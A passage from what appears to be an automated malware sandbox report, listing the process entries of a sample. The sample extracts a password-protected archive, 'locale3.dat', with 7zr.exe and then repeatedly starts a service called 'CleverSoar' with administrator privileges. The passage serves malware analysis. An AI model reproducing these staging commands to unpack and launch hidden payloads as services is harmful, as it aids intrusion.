                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:01:42:22
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:01:42:22
                                                          Start date:23/12/2024
                                                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                                          Imagebase:0x7ff642ec0000
                                                          File size:831'200 bytes
                                                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:01:42:22
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:22
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:23
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:24
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:25
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:26
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:27
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:28
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:29
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:30
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:31
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:32
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:33
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:34
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff717f30000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:35
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:36
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:37
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:38
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:39
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:40
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:41
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:42
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:43
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:44
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:45
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:46
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:47
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:48
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:49
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:50
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:51
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:52
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:53
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:54
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:55
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:56
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:57
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:58
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:59
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:60
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7403e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:61
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:62
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:63
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:64
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:65
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:66
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:67
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:68
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:69
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:70
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:71
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:72
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:73
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:74
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
